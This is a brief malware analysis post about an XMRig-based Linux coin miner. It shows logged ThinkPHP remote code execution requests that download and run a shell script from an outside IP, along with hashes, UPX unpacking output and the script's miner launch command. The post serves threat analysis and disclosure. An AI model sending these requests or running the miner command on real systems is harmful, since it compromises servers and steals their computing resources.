Coin mining malware based on XMRig (ELF) | Joachim De Zutter
March 2019

Logs:
2019-03-02 08:24:08.422937 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:08.939645 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:09.579733 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:10.859991 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:13.423866 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:18.548630 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
File name: a.sh
File size: 616
MD5: 6d3c45fcb8d731ea9d7549b7f7800888
SHA1: 7b42391c50eb487901b5564c3796ad55698b3aec
SHA256: e50ae82bb89d6ddbf8c7b1c00b12777d2ab44a861a4ece9902072853e20e8ed1
VirusTotal report
File name: xmrig_s
File size: 1021704
MD5: e728868c7a70f9f778888c762a2c4406
SHA1: 2d7f25c92ec64a58a6675ea21a9788ff01ccf27d
SHA256: 62131474ebab19c480a7991ea2c995921c9d2842f2e7afbff73676e4b59fc4f3
Apparently this miner is packed with UPX.
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2951766 <-   1021704   34.61%  linux/ElfAMD   xmrig_s

Unpacked 1 file.
File size: 2949696
MD5: ca77ee60bed091efea90f32c9e0b7c79
SHA1: 70e40363667d15021ff21f6a7f07a8b157f335a4
SHA256: a91dc4defcb569cbd4f1598a35752f527ca9f0389d1e9eeb2b0b9566b3554963
VirusTotal report

Apparently this miner is based on XMRig 2.13.0.

a.sh script contains:
	if [ "$(ps x | grep -c "xmri[g]")" -lt "1" ]; then
		/tmp/xmrig_s -r 1000 --donate-level 1 -o 119.23.222.239:26590 -B -p pass -k --max-cpu-usage=99 ;
	fi